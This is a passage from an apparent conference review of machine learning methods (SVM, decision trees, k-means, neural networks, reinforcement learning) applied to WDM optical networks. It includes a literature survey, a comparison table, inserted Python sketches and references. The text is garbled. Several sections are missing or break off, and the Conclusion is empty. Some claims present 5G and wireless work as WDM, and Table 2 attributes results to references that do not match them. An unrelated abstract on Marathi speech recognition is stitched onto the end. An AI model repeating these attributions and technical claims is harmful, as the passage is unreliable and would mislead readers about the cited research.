networks, helps in network control and resource management that are useful in
service provisioning and resource assignment. This paper gives a comprehensive
review of machine learning approaches in WDM optical networks concerning support
vector machine (SVM), K-nearest neighbour (K-NN), decision tree, random forest
and neural networks algorithms. These algorithms’ performances are compared in
terms of accuracy and AUC; further, the accuracy and AUC results show an average
outcome of 99% and 0.98, respectively. Simulation can be performed on MATLAB
and Net2plan tools using different data sets in terms of average accuracy and AUC for
WDM optical networks. This research’s future directions can be towards ML utiliza-
tion to provide optimal routing and wavelength assignment, increasing bandwidth
utilization to reduce control overheads, reduce computational complexity, security,
fault occurrence and monitoring schemes for WDM optical networks supporting 5G
applications.
1 Introduction
Machine learning is a technology that provides the system with the capability of
learning and improving automatically from experiences. The computer programs
are designed through machine learning in such a way that the data can be accessed
and learned on their own. It is a branch of artificial intelligence that is gaining huge
popularity in today’s technology [1]. The machines can execute the intellectual tasks
that were traditionally solved by humans through machine learning technology that
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 645
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_52
646 S. Rai and A. K. Garg
provides complex mathematical and statistical tools. In all the networking fields, the
idea of automating complex tasks has been of great interest since the machines can
be given the tasks of designing and operating communication networks [2]. Also,
the implementation of deep learning algorithms, especially convolutional neural
networks (CNN), brings huge benefits to the medical field, where a huge number
of images are to be processed and analysed [3]. This paper focuses on reviewing
the applications of ML in optical networking-based technologies. Supervised and
unsupervised are the two commonly known types of machine learning algorithms.
A hybrid of supervised learning and unsupervised learning is known as semi-supervised learning. Apart from these, a few other machine learning algorithms are explained further [4].
(1) Supervised learning: The algorithm that trains the machine using examples,
also known as instances, is known as supervised learning. Training and Test
are the two sets of data provided for learning through this method. A training
set includes instances of input and output. These instances are used to discover
patterns relevant to new inputs and outputs given to the machine [5]. Supervised
learning is distinguished in classification and regression. Classification maps
the input space into pre-defined classes. The regression approach maps input
space across the real-value domain [6]. The most commonly used supervised
learning algorithms are:
(a) Decision Tree: The algorithm that groups the attributes by sorting them
based on their values is known as a decision tree. There are nodes and
branches available in each tree. Each node represents attributes in a group
that is to be classified. A value that is assigned to the node is repre-
sented by each branch. The general implementation of the decision tree
algorithm is presented in Fig. 1.
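As a minimal sketch of the node/branch idea, a one-level tree (a decision stump) on toy data picks the attribute threshold that minimizes the weighted Gini impurity of the two branches (the data below is illustrative, not from the paper):

```python
def gini(labels):
    """Gini impurity of a set of binary labels."""
    n = len(labels)
    if n == 0:
        return 0.0
    p = sum(labels) / n
    return 1.0 - p * p - (1 - p) * (1 - p)

def best_split(values, labels):
    """Try a threshold at each distinct value; return the threshold with
    the lowest weighted Gini impurity of the resulting two branches."""
    best = (None, float("inf"))
    for t in sorted(set(values)):
        left = [y for v, y in zip(values, labels) if v <= t]
        right = [y for v, y in zip(values, labels) if v > t]
        score = (len(left) * gini(left) + len(right) * gini(right)) / len(labels)
        if score < best[1]:
            best = (t, score)
    return best

# Toy attribute: values up to 3 are class 0, values from 6 up are class 1.
values = [1, 2, 3, 6, 7, 8]
labels = [0, 0, 0, 1, 1, 1]
print(best_split(values, labels))  # (3, 0.0): splitting at 3 gives pure branches
```

A full decision tree simply applies this split search recursively to each branch until the nodes are pure or a depth limit is reached.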
(b) Naïve Bayes: The text classification industry mostly uses Naïve Bayes
algorithm for classification and clustering. It works on the principle of
conditional probability.
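The conditional-probability principle can be sketched with Bayes' rule over word counts. The three-document corpus below is a toy example with Laplace smoothing assumed, not a real text-classification pipeline:

```python
from collections import Counter

# Toy training corpus: (document words, label).
docs = [("great movie".split(), "pos"),
        ("great fun".split(), "pos"),
        ("boring movie".split(), "neg")]

counts = {"pos": Counter(), "neg": Counter()}
class_docs = Counter()
for words, label in docs:
    counts[label].update(words)
    class_docs[label] += 1

vocab = {w for words, _ in docs for w in words}

def posterior(words, label):
    """Unnormalized P(label) * prod P(word | label), Laplace-smoothed."""
    p = class_docs[label] / sum(class_docs.values())
    total = sum(counts[label].values())
    for w in words:
        p *= (counts[label][w] + 1) / (total + len(vocab))
    return p

doc = "great movie".split()
pred = max(("pos", "neg"), key=lambda c: posterior(doc, c))
print(pred)  # pos
```

The "naïve" part is the product over words: each word is assumed conditionally independent of the others given the class.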
(c) Support Vector Machine: This is another widely used machine learning
algorithm, applied mainly to classification. Margin calculation is the basic
principle of this algorithm [7]. A margin is drawn between the classes in
such a manner that the distance between the margin and the classes is
maximal, as a result of which the classification error is minimal.
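The margin principle can be illustrated numerically: for a fixed separating hyperplane w·x + b = 0, the geometric margin is the smallest distance from any training point to the hyperplane, and SVM training chooses w and b to maximise it. A small Python sketch, with hypothetical data:

```python
import math

def geometric_margin(w, b, points):
    """Smallest distance |w.x + b| / ||w|| from any point to the hyperplane w.x + b = 0."""
    norm = math.sqrt(sum(wi * wi for wi in w))
    return min(abs(sum(wi * xi for wi, xi in zip(w, x)) + b) / norm
               for x in points)
```

For w = (0, 1) and b = 0, the points (5, 2) and (3, -1) lie at distances 2 and 1 from the hyperplane, so the margin is 1.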
(2) Unsupervised learning: In unsupervised learning, the input is unlabelled, i.e.
no desired outputs are provided. Input points that lie close to each other can be
clustered by this type of algorithm. The most commonly used unsupervised
learning techniques are (a) K-Means Clustering and (b) Principal Component
Analysis [8].
(a) K-Means Clustering: This technique automatically groups data into
clusters, where each cluster includes items with similar characteristics.
Since k distinct clusters are created, the algorithm is known as k-means.
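A minimal sketch of the k-means procedure (Lloyd's algorithm) on one-dimensional data; the function name and data are illustrative:

```python
import random

def kmeans(points, k, iters=20, seed=0):
    """Alternate between assigning each point to its nearest centroid and
    recomputing each centroid as the mean of its cluster."""
    rng = random.Random(seed)
    centroids = rng.sample(points, k)
    for _ in range(iters):
        clusters = [[] for _ in range(k)]
        for p in points:
            nearest = min(range(k), key=lambda j: (p - centroids[j]) ** 2)
            clusters[nearest].append(p)
        # keep the old centroid if a cluster ends up empty
        centroids = [sum(c) / len(c) if c else centroids[i]
                     for i, c in enumerate(clusters)]
    return sorted(centroids)
```

On points drawn around 1.0 and 10.0 with k = 2, the centroids converge to roughly 1.0 and 10.0.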
Impact of Machine Learning Algorithms on WDM … 647
(3) Semi-supervised learning: The most commonly used semi-supervised techniques are:
(a) Self-Training: A classifier is first trained on the labelled data and then
used to label the unlabelled data; the most confident points and predicted
labels are added to the training set, and the process is iterated. This
classifier is named self-training since it performs learning on its own.
(b) Transductive SVM: This is an extension of the SVM algorithm. Both
labelled and unlabelled data are included in TSVM. The unlabelled data
is labelled in such a manner that the margin between the labelled and
unlabelled data is maximal [10].
(4) Reinforcement learning: In reinforcement learning, the algorithm interacts
with the surrounding environment and uses its observations to take actions
that increase the reward or reduce the risk.
(5) Neural Network Learning: This is also commonly known as an artificial neural
network (ANN). The algorithm is modelled on the basic concept of the neurons
residing in the human brain. There are three layers in this algorithm: the input
is given to the input layer, processed by the second layer, known as the hidden
layer, and the calculated output is forwarded to the output layer.
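The three-layer flow described above can be sketched as a single forward pass with sigmoid units (weights and data here are illustrative):

```python
import math

def forward(x, w_hidden, w_output):
    """Input layer -> hidden layer (sigmoid) -> output layer (sigmoid).
    w_hidden[j] holds the weights from the inputs to hidden unit j;
    w_output[k] holds the weights from the hidden units to output unit k."""
    sigmoid = lambda z: 1.0 / (1.0 + math.exp(-z))
    hidden = [sigmoid(sum(wi * xi for wi, xi in zip(row, x))) for row in w_hidden]
    return [sigmoid(sum(wi * hi for wi, hi in zip(row, hidden))) for row in w_output]
```

With all-zero weights every unit outputs sigmoid(0) = 0.5, which is a convenient sanity check before training.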
(6) Ensemble Learning: This algorithm combines different individual learners to
generate a single learner. The individual learners can be any of the above-
mentioned learners, such as a neural network, decision tree or naïve Bayes [11].
Experimental simulations have shown that the performance of collective
learners is generally better than that of any individual learner.
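Combining individual learners can be as simple as majority voting over their per-sample predictions, as in this illustrative sketch:

```python
from collections import Counter

def majority_vote(predictions):
    """predictions[i] is learner i's label list; return the per-sample majority label."""
    return [Counter(sample).most_common(1)[0][0] for sample in zip(*predictions)]
```

Even when each learner misclassifies one sample, the vote can recover the correct label on every sample, which is the intuition behind ensembles.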
As shown in Fig. 1, the decision tree algorithm considers the values of only one
attribute at a time to create the tree model. The algorithm first sorts the dataset on
the attribute value. In the next step, the regions of the dataset that clearly contain
only one class are identified; these regions are then marked as leaves. For the
remaining regions, which contain more than one class, the algorithm chooses another
attribute, and the branching process continues using only the instances present in
those regions.
The process works iteratively until no attributes are left to generate leaves or until
all the leaves possible in those regions are generated. The pseudo-code of the optimal
decision tree algorithm is presented below:
Input: Data partition D // the set of training tuples and their associated class labels
attribute_list // the set of candidate attributes
attribute_selection_method // determines the best criterion for partitioning the data
tuples into individual classes
Output: A decision tree.
Algorithm:
• Create a node N;
• if all the tuples in D belong to the same class C, then
return N as a leaf node labeled with class C;
• if attribute_list is empty, then
return N as a leaf node labeled with the majority class in D; // majority voting
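A runnable Python sketch of the leaf rules in the pseudo-code above; the attribute-selection step is replaced by a simple "take the next attribute" stand-in, and the data layout is illustrative:

```python
from collections import Counter

def grow_tree(rows, labels, attributes):
    """Return a leaf label, or (attribute, {value: subtree}) grown recursively."""
    if len(set(labels)) == 1:
        return labels[0]                                 # all tuples share one class
    if not attributes:
        return Counter(labels).most_common(1)[0][0]      # majority voting
    attr = attributes[0]                                 # stand-in for attribute_selection_method
    tree = {}
    for value in set(row[attr] for row in rows):
        idx = [i for i, row in enumerate(rows) if row[attr] == value]
        tree[value] = grow_tree([rows[i] for i in idx],
                                [labels[i] for i in idx],
                                attributes[1:])
    return (attr, tree)
```

A real implementation would pick `attr` by a purity criterion such as information gain, but the stopping rules are exactly those of the pseudo-code.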
monitoring the performance of physical layer link, signal and failure management
[16].
Figure 2 shows the general system architecture of optical networks incorporating
machine learning techniques. This system deploys an intelligent module that includes
functional elements (FEs) and ML agents. FEs enable interactions between the ML
agents and the optical network. In this process, the raw data is first collected
from the optical network by the data collection module. This data is then pre-
processed into a suitable data structure by the data processing module [17] so that it
can be used for training ML models. To support the FEs in network data collection
and processing, network protocols and functions need to be improved. The
next step is to train the data which is done by forwarding this pre-processed network
data to the ML agents. There are three important paradigms of optical networks in
which the ML agent generally works [18]. They are: regression, classification and
decision-making. To solve the regression and classification problems, supervised and
unsupervised learning are applied. Iterative optimization is performed using learning
algorithms with training datasets to determine the ML model parameters as shown
in Fig. 2a. The methods that enhance the model performance are known as learning
algorithms. The optimal strategy is learned by the ML models in the decision-making
tasks by interacting with the environment which here is the optical network as shown
in Fig. 2b. Depending upon the performance of the action, the algorithm receives a
reward in such networks. Such rewards can then be used to update the decision-
making strategies. For most decision-making problems,
reinforcement learning methods are applied [19].
WDM is designed as a leading infrastructure technology for the information and
communication technology industry, supporting the growing demand of mobile
traffic and a variety of new services with diverse requirements. Given the increasing
complexity of networks and the evolution of new use cases over time, it is important
to include ML in making the WDM vision conceivable. This technology ensures
that, in comparison to previous technologies, users are provided with higher security,
reliability and flexibility.
The paper is organized as follows. Section 1 introduces the basic concept of
machine learning in context to WDM optical networks. Section 2 describes the
previous research work in the development of WDM high-speed optical networks.
Section 3 outlines the performance parameters. Section 4 explains the performance
outcomes of existing techniques. Finally, Sects. 5 and 6 present the conclusion and
the future scope, respectively.
2 Literature Survey
Gao et al. (2020) reviewed the different problems solved using machine learning
methods [21]. There are still many challenges being faced when applying ML tech-
niques to optical networks, although several advancements have been made on this
technology. The paper reviewed four typical applications of AI techniques: power
optimization, failure management, routing and wavelength assignment (RWA), and
low-margin design. It was seen that applying ML enhanced the performance of these
applications in terms of reliability and capacity. Thus, the review outlined the
possible challenges and future research
directions for optical networks using ML techniques.
Gu et al. (2020) presented a survey for intelligent optical networks applying ML.
Based on their use cases, the applications of ML were categorized [20]. Resource
management, optical networks monitoring and survivability and optical network
control were the common categorizations. Based on the ML techniques used, the use
652 S. Rai and A. K. Garg
cases were analysed and compared. Depending on such previous analysis, the new
motivations were derived. Additionally, this survey also discussed the challenges and
possible solutions for intelligent optical networks using ML.
Panayiotou et al. (2020) examined the different ML-based frameworks designed
to achieve QoT [22]. Since the requirements of QoTs are diverse, it was important
to identify appropriate frameworks. It was seen that, particularly as the number of
diverse QoT requirements increased, the distributed QoT models performed better
than the centralized ones. Additional QoS could be achieved in the
ML-based optical frameworks by analysing centralized and distributed frameworks
in terms of management and efficiency control.
Khan et al. (2020) proposed that for fibre-optic communication systems, the ML
techniques would provide unique and powerful signal processing tools [23]. For
resolving challenges that could not be handled using traditional approaches, ML
and big data analytics could provide better outcomes for optical networks, which
are growing in speed and becoming more dynamic and software-defined. Thus, in
optical communications and networking, ML-based knowledge skills proved to be
highly beneficial.
Yang et al. (2020) proposed a new mechanism for achieving zero-touch operation
in optical network architecture [24]. Without any manual intervention, maintenance
and intent-based network operation issues could be resolved through this approach.
For automatic optical network operation, the functional entities of the
architecture and interworking process were studied in this research. Experiments
were conducted, and the outcomes achieved showed that the intent translation and
zero-touch configuration were performed effectively. The zero-touch configuration
operation was protected by two closed loops, which included closed-loop policy and
closed-loop intent.
Hindia et al. (2020) proposed a comparative analysis of cognitive radio (CR)-based
technology in WDM technology [25]. Based on spectrum allocation methods, the
impact and roles of MAC layer in spectrum sensing and sharing were presented in this
research. The various viable intelligent routing protocols were analysed. The research
showed that the primary motivation of future research could be the issues related to
reduction in spectrum and lower usage of resources. For future WDM networks, the
CR technology could maximize the usage of highly unused communication spectrum
bands.
Troia et al. (2019) proposed research in which the dynamic SFC resource alloca-
tion was applied for software defined network (SDN)-based optical networks using
reinforcement learning (RL) [26]. For optimizing the resources allocation in multi-
layer networks, an RL system was designed in this research. Given the network
state and historical traffic traces, the decision to reconfigure service function
chains (SFCs) was made by RL agents. The proposed method was compared
with a rule-based optimization design which showed that the proposed method
provided better outcomes. The sudden changes in traffic shape were predicted, and
the reconfiguration of SFCs was triggered using this method.
Musumeci et al. (2019) presented a study of the optical communication and
networking approaches using ML [27]. A survey of relevant studies was conducted
in this research, and an introductory tutorial on ML was provided to help researchers
in future research.
Wang et al. (2018) proposed research in which a hybrid method was identified
as channel coding for WDM communications in the enhanced mobile broadband
(eMBB) scenario, supporting LDPC codes for the data plane and polar codes for the
control plane [33]. Designing powerful decoders at the terminal side was the major
challenge faced in this research. By concatenating an indicator section, a deep
learning-based unified polar-LDPC decoder was
proposed here. A comparative evaluation was performed to evaluate the performances
of traditional and newly designed methods. The implementation resources were saved
here since the proposed unified approach applied similar network architecture and
parameters.
Fagbohun (2014) proposed a study in which devices were provided with effective
connection and communication services through new ML technology, with the aim
of increasing the flexibility of network connectivity and providing supporting capa-
bility [34]. The communication-related issues were not resolved using traditionally
designed techniques. Wireless technology has risen to a new level with the involve-
ment of WDM. These systems would work on providing simple network scenarios
with more functionality to the end nodes. The future concepts of mobile communica-
tion would link the multiple diverse research approaches being designed to provide
improvement in this field (Table 1).
Table 1 Comparison of the reviewed techniques (Ref. No. | Authors names | Year of
publication | Proposed technique | Result outcomes | Limitations and future scope)

[22] Panayiotou et al. (2020). Proposed technique: Since the requirements of QoTs
are diverse, it was important to identify appropriate frameworks; the simulations
were performed depending upon training time and accuracy. Result outcomes: It was
seen that, particularly with the increase in the number of diverse QoT requirements,
the performance of distributed QoT models was better compared to centralized ones.
Limitations and future scope: QoS could be achieved in ML-based optical frame-
works by analysing centralized and distributed frameworks in terms of management
and efficiency control.

[23] Khan et al. (2020). Proposed technique: For resolving challenges which could
not be handled using traditional approaches, ML and big data analytics could provide
better outcomes for optical networks, which are growing in speed and becoming
more dynamic and software-defined. Result outcomes: In optical communications
and networking, ML-based knowledge skills proved to be highly beneficial. Limita-
tions and future scope: The computational complexity of ML algorithms was not
discussed, which could be a motivation to extend this research in future.

[24] Yang, Zhan, et al. (2020). Proposed technique: A new mechanism was proposed
for achieving zero-touch operation in optical network architecture; without any
manual intervention, maintenance and intent-based network operation issues could
be resolved through this approach. Result outcomes: The zero-touch configuration
operation was protected by two closed loops. Limitations and future scope: There
was a huge reality gap between the simulation and real networks, which could be
used as a motivation to extend this research in future.

[25] Hindia et al. (2020). Proposed technique: A comparative analysis of cognitive
radio (CR)-based technology in WDM technology was presented; based on spectrum
allocation methods, the utilization of MAC was presented in this research. Result
outcomes: The research showed that the primary motivation of future research could
be the issues related to reducing spectrum and underutilization of resources. Limita-
tions and future scope: For future WDM networks, the CR technology could maxi-
mize the usage of highly unused communication spectrum bands.

[26] Troia et al. (2019). Proposed technique: Dynamic SFC resource allocation was
applied for SDN-based optical networks using RL; an RL system was designed for
optimizing resource allocation in multi-layer networks. Result outcomes: The
outcomes showed a rapid variation in the traffic as well as triggering of reconfigura-
tion of SFCs. Limitations and future scope: The computational complexity of ML
algorithms was not discussed, which could be a motivation to extend this research
in future.

[27] Musumeci et al. (2019). Proposed technique: A survey of relevant studies was
conducted, and an introductory tutorial on ML was provided to help researchers in
future research; applying ML in optical networks is very new even though several
studies exist. Result outcomes: New possible research directions were outlined
through this research for providing ease in further research simulations. Limitations
and future scope: The computational complexity of ML algorithms was not
discussed, which could be used as a future direction to extend this research.

[…] Proposed technique: A memory network was designed and implemented in this
research using a deep learning algorithm. Result outcomes: Allocations were reduced
by 75% by applying the proposed approach. Limitations and future scope: The
computational complexity of ML algorithms was not discussed, which could be used
as a future direction to extend this research.

[30] Casellas et al. (2018). Proposed technique: A novel architecture was proposed
for automatically deploying WDM services in metropolitan networks, allowing an
interface between WDM and optical networks. Result outcomes: For covering the
metropolitan networks that interface with WDM using optical networks, the WDM
services were deployed to provide control, management and orchestration. Limita-
tions and future scope: The computational complexity of ML algorithms was not
discussed, which could be a motivation to extend this research in future.

[31] Morais et al. (2018). Proposed technique: The effectiveness of different ML
models was evaluated; the goals of this research were predicting the QoT of a light-
path and increasing the speed of lightpath provisioning. Result outcomes: With
accuracies of 99%, the ANNs provided the best generalization; further, the residual
margin was predicted through ANNs with an average error of less than 0.4 dB.
Limitations and future scope: The future concepts of mobile communication would
link the multiple diverse research approaches being designed to provide improvement
in this field.

[32] Pelekanou et al. (2018). Proposed technique: A novel approach was proposed
in which less-complex ML techniques were applied to design optimal online WDM
service provision frameworks; for making optimal decisions, neural networks (NNs)
were applied. Result outcomes: The conducted experiments showed that the perfor-
mance of the highly complex but accurate ILP approach and that of the NN-based
real-time service were very similar. Limitations and future scope: There was a huge
reality gap between the simulation and real networks, which could be used as a
motivation to extend this research in future.

[33] Wang et al. (2018). Proposed technique: A hybrid channel coding method was
identified for WDM communications in the enhanced mobile broadband (eMBB)
scenario; by concatenating an indicator section, a deep learning-based unified polar-
LDPC decoder was proposed. Result outcomes: The implementation resources were
saved since the proposed unified approach applied similar network architecture and
parameters. Limitations and future scope: This research did not focus on attacks and
intrusion detection methods for optical networks applying ML algorithms; future
research could focus on this challenge.

[34] Fagbohun (2014). Proposed technique: Devices were provided with effective
connection and communication services through new ML technology, with the aim
of increasing the flexibility of network connectivity and providing supporting capa-
bility. Result outcomes: The communication-related issues were not resolved using
traditionally designed techniques; these systems would work on providing simple
network scenarios with more functionality to the end nodes. Limitations and future
scope: The future concepts of mobile communication would link the multiple diverse
research approaches being designed to provide improvement in this field.

3 Performance Parameters
f. False Positive Rate (FPR): The fraction of negative samples within the test set
that are incorrectly classified as positive is represented by FPR.
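With labels encoded as 1 (positive) and 0 (negative), this definition translates directly into code (illustrative sketch, not from any cited work):

```python
def false_positive_rate(y_true, y_pred):
    """FPR = FP / (FP + TN): the share of true negatives predicted as positive."""
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    tn = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 0)
    return fp / (fp + tn)
```

For example, with four negatives of which one is predicted positive, the FPR is 1/4 = 0.25.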
Table 2 Comparative analysis of various techniques in terms of accuracy and AUC

Performance parameter | CBR [33] | RF [34] | SVM [35]
Accuracy | 99% | 97% | 99.15%
AUC | 0.97 | 0.98 | 0.9909
Fig. 3 Comparison of ML algorithms in terms of accuracy
5 Conclusion
6 Future Scope
This review also outlines the future directions through which this technology can be
improved. ML algorithms used in optical networks make them vulnerable to various
security attacks and intrusions. To maintain the data integrity, future research could
provide more reliable and secure techniques. Additionally, new approaches could
emphasize maximizing the usage of highly unused communication spectrum bands
in optical networks.
References
1. Liu, J., Wang, G., Hu, P., Duan, L. Y., & Kot, A. C. (2017). Global context-aware attention
LSTM networks for 3D action recognition. In Proceedings—30th IEEE Conference Computer
Vision Pattern Recognition, CVPR 2017 (vol. 2017-Janua, pp. 3671–3680). https://doi.org/10.
1109/CVPR.2017.391.
2. Zibar, D., Piels, M., Jones, R., & Schaeffer, C. G. (2015). Machine learning techniques in
optical communication. https://doi.org/10.1109/ECOC.2015.7341896.
3. Tiwari, P., et al. (2018). Detection of subtype blood cells using deep learning. Cognitive Systems
Research, 52, 1036–1044. https://doi.org/10.1016/j.cogsys.2018.08.022
4. Pan, C., Henning, B., Idler, W., Schmalen, L., & Fellow, F. R. K. (2015). Optical nonlinear-
phase-noise compensation for a code-aided expectation-maximization algorithm (no. July,
pp. 1–8).
5. Xu, R., & Wunsch, D. (2005). Survey of clustering algorithms. IEEE Transactions on Neural
Networks, 16(3), 645–678. https://doi.org/10.1109/TNN.2005.845141
6. Song, C., Zhang, M., Huang, X., Zhan, Y., Wang, D., Liu, M. (2018). Machine learning enabling
traffic-aware dynamic slicing for 5G optical transport networks. [Online]. Available: https://
www.osapublishing.org/oe/viewmedia.cfm?uri=oe-21-12-14859&seq=0.
7. Macaluso, I., Finn, D., Ozgul, B., & Dasilva, L. A. (2013). Complexity of spectrum activity and
benefits of reinforcement learning for dynamic channel selection. IEEE Journal on Selected
Areas in Communications, 31(11), 2237–2248. https://doi.org/10.1109/JSAC.2013.131115
8. Ye, H., Li, G. Y., & Juang, B. H. (2018). Power of deep learning for channel estimation and signal
detection in OFDM systems. IEEE Wireless Communication Letter, 7(1), 114–117. https://doi.
org/10.1109/LWC.2017.2757490
9. O’Shea, T. J., Erpek, T., & Clancy, T. C. (2017). Deep learning-based MIMO communications.
arXiv, pp. 1–9.
10. Thrane, J., Wass, J., Piels, M., Diniz, J. C. M., Jones, R. T., & Zibar, D. (2017). Machine
learning technique for optical performance monitoring from directly detected PDM-QAM
signals. Journal of Lightwave Technology, 35(4), 868–875.
11. Angelou, M., Pointurier, Y., Careglio, D., & Spadaro, S. (2012). Optimized monitor placement
for accurate QoT assessment in core optical networks. Journal of Optical Communications
and Networking, 4(1), 15–24. [Online]. Available: https://www.osapublishing.org/oe/abstract.
cfm?uri=oe-18-2-670.
12. Karim, M., & Rahman, R. M. (2013). Decision Tree and Naïve Bayes Algorithm for Classi-
fication and Generation of Actionable Knowledge for Direct Marketing. Journal of Software
Engineering and Applications, 06(04), 196–206. https://doi.org/10.4236/jsea.2013.64025
13. Sartzetakis, I., Christodoulopoulos, K., Tsekrekos, C. P., Syvridis, D., & Varvarigos, E. (2016).
Quality of transmission estimation in WDM and elastic optical networks accounting for space-
spectrum dependencies. Journal of Optical Communications and Networking, 8(9), 676–688.
https://doi.org/10.1364/JOCN.8.000676
14. Pointurier, Y., Coates, M., & Rabbat, M. (2011). Cross-layer monitoring in transparent optical
networks. Journal of Optical Communications and Networking, 3(3), 189–198. https://doi.org/
10.1364/JOCN.3.000189
15. Sambo, N., Pointurier, Y., Cugini, F., Valcarenghi, L., Castoldi, P., & Tomkos, I. (2010). Light-
path establishment assisted by offline QoT estimation in transparent optical networks. Journal
of Optical Communications and Networking, 2(11), 928–937. https://doi.org/10.1364/JOCN.
2.000928
16. Barletta, L., Giusti, A., Rottondi, C., & Tornatore, M. (2017). QoT estimation for unestablished
lightpaths using machine learning. In 2017 Optical Fiber Communications Conference and
Exhibition (OFC) (pp. 5–7). https://doi.org/10.1364/ofc.2017.th1j.1
17. Seve, E., Pesic, J., Delezoide, C., Bigo, S., & Pointurier, Y. (2018). Learning process for
reducing uncertainties on network parameters and design margins. Journal of Optical Commu-
nications and Networking, 10(2), A298–A306. https://doi.org/10.1364/JOCN.10.00A298
18. Panayiotou, T., Ellinas, G., & Chatzis, S. P. (2016). A data-driven QoT decision approach
for multicast connections in metro optical networks. In 2016 International Conference on
Optical Network Design and Modeling ONDM 2016, no. Dec 2017, 2016 https://doi.org/10.
1109/ONDM.2016.7494074.
19. Panayiotou, T., Chatzis, S. P., & Ellinas, G. (2017). Performance analysis of a data-driven
quality-of-transmission decision approach on a dynamic multicast- capable metro optical
network. Journal of Optical Communications and Networking, 9(1), 98–108. https://doi.org/
10.1364/JOCN.9.000098
20. Gu, R., Yang, Z., & Ji, Y. (2020). Machine learning for intelligent optical networks: A compre-
hensive survey. Journal of Networking Computer Application, 157. https://doi.org/10.1016/j.
jnca.2020.102576.
21. Gao, R., et al. (2020). An overview of ML-based applications for next generation optical
networks. Science China Information Sciences, 63(6), 1–16. https://doi.org/10.1007/s11432-
020-2874-y
22. Panayiotou, T., Savva, G., Tomkos, I., & Ellinas, G. (2019). Centralized and distributed machine
learning-based QoT estimation for sliceable optical networks. arXiv.
23. Khan, F. N., Fan, Q., Lu, C., & Lau, A. P. T. (2019). Machine learning methods for optical
communication systems and networks. Elsevier Inc.
24. Zhan, K., et al. (2020). Intent defined optical network: Toward artificial intelligence-based
optical network automation. In Optics InfoBase Conference Papers (vol. Part F174-, no. June,
pp. 1–12, 2020). https://doi.org/10.1364/OFC.2020.T3J.6.
25. Hindia, M. N., Qamar, F., Ojukwu, H., Dimyati, K., Al-Samman, A. M., & Amiri, I. S.
(2020). On Platform to Enable the Cognitive Radio Over 5G Networks. Wireless Personal
Communications, 113(2), 1241–1262. https://doi.org/10.1007/s11277-020-07277-3
26. Troia, S., Alvizu, R., & Maier, G. (2019). Reinforcement learning for service function chain
reconfiguration in NFV-SDN metro-core optical networks. IEEE Access, 7, 167944–167957.
https://doi.org/10.1109/ACCESS.2019.2953498
27. Musumeci, F., et al. (2019). An Overview on Application of Machine Learning Techniques in
Optical Networks. IEEE Communication Survey Tutorials, 21(2), 1383–1408. https://doi.org/
10.1109/COMST.2018.2880039
28. Morocho-Cayamcela, M. E., Lee, H., & Lim, W. (2019). Machine learning for 5G/B5G
mobile and wireless communications: Potential, limitations, and future directions. IEEE Access,
7(Sept), 137184–137206. https://doi.org/10.1109/ACCESS.2019.2942390
29. Toscano, M., Grunwald, F., Richart, M., Baliosian, J., Grampín, E., & Castro, A. (2019).
Machine learning aided network slicing. In International Conference on Transparent Optical
Networks (ICTON) (Vol. 2019-July, pp. 8–11, 2019). https://doi.org/10.1109/ICTON.2019.884
0141.
30. Casellas, R., et al. (2018). Enabling data analytics and machine learning for 5G services
within disaggregated multi-layer transport networks. In International Conference on Trans-
parent Optical Networks (ICTON) (vol. 2018-July, pp. 1–4). https://doi.org/10.1109/ICTON.
2018.8473832.
31. Morais, R. M., & Pedro, J. (2018). Machine learning models for estimating quality of trans-
mission in DWDM networks. Journal of Optical Communications and Networking, 10(10),
D84–D99. https://doi.org/10.1364/JOCN.10.000D84
32. Pelekanou, A., Anastasopoulos, M., Tzanakaki, A., & Simeonidou, D. (2018). Provisioning
of 5G services employing machine learning techniques. In 2018 International Conference on
Optical Network Design and Modeling (ONDM) 2018—Proceedings (vol. 1, pp. 200–205)
https://doi.org/10.23919/ONDM.2018.8396131.
33. Wang, Y., Zhang, Z., Zhang, S., Cao, S., & Xu, S. (2018). A unified deep learning based
polar-LDPC decoder for 5G communication systems. In 2018 10th International Conferences
of Wireless Communication Signal Process. WCSP 2018 (pp. 1–6). https://doi.org/10.1109/
WCSP.2018.8555891.
34. Fagbohun, O. O. (2014). Comparative studies on 3G,4G and 5G wireless technology. IOSR
Journal Electronics Communication Engineering, 9(2), 133–139. https://doi.org/10.9790/
2834-0925133139
35. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107. https://doi.org/10.1007/
s00521-020-04761-6
36. Rottondi, C., Barletta, L., Giusti, A., & Tornatore, M. (2018). Machine-learning method for
quality of transmission prediction of unestablished lightpaths. Journal of Optical Communi-
cations and Networking, 10(2), A286–A297. https://doi.org/10.1364/JOCN.10.00A286
37. De Miguel, I., et al. (2013). Cognitive dynamic optical networks. In Optical Fiber Communi-
cations Conference and Exposition OFC 2013 (pp. 18–20). https://doi.org/10.1364/ofc.2013.
ow1h.1.
38. Aladin, S., & Tremblay, C. (2018). Cognitive tool for estimating the QoT of new lightpaths.
In 2018 Optical Fiber Communications Conference and Exposition OFC 2018— Proceedings
(Vol. 3, pp. 1–3, 2018). https://doi.org/10.1364/ofc.2018.m3a.3.
39. Shahkarami, S., Musumeci, F., Cugini, F., & Tornatore, M. (2018). Machine-learning-based
soft-failure detection and identification in optical networks. In Optical InfoBase Conference
Papers (Vol. Part F84-O, pp. 37–39). https://doi.org/10.1364/OFC.2018.M3A.5.
Duo Features with
Hybrid-Meta-Heuristic-Deep Belief
Network Based Pattern Recognition for
Marathi Speech Recognition
Abstract Marathi speech recognition is challenging due to the many dialects, vari-
ability in pronunciation, and the limited size of speech corpus available for developing
a speech recognition system. This work addresses the critical issues in developing
a speech recognition system for the Marathi Language. The paper evaluates various
approaches for feature extraction and pattern recognition and proposes optimized
methods for feature extraction and pattern recognition of the Marathi language.
Evaluation is classified into two parts—Feature Extraction Techniques and Pattern
Recognition Techniques. In feature extraction, MFCC and spectral features are eval-
uated, and their results are compared for analysis purposes using six measures. In
pattern recognition, DBN is optimized with different techniques such as WOA, GWO,
CBBO, and ROA and analyzed using six performance measure parameters. Finally,
the duo feature hybrid algorithm for feature extraction and new pattern recognition
approach RCBO-DBN has been proposed, and its performance is compared with
earlier techniques.
